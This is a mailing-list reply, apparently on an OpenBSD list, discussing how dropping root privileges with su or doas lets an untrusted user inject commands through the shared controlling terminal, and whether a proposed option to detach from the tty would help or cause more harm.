> > I stumbled upon unexpected behavior on OpenBSD 6.0 (all patches) > > which seems to allow running commands as the original user when > > using su and doas interactively because the controlling terminal > > is the same. > > > Is this behavior expected and if so, how do I run commands from > > root as an untrusted user? It's not mentioned in the man page > > that using su/doas as root might allow other users to run code as > > root. > > Oh, interesting. The main design of doas is to escalate privileges, allowing > users to run commands as root. But it certainly looks appealing to use it to > drop privileges as well. > > It's easy to add an option to disassociate from the controlling tty. I'm not > sure if this solves every problem, but it certainly blocks direct tty > injection. (You also pick up some privileges from being in a session or > process group, but those privileges are less powerful.) > > Certain commands require a controlling tty, but that seems to be mostly > shells. Even vi and mg work ok.
People (and programs) are not used to operating without tty associating; furthermore study of failure condition becomes really difficult. I don't see a way that -D can be used correctly. I suspect it will not be used when it is needed; and it will be used when it causes more harm than good.
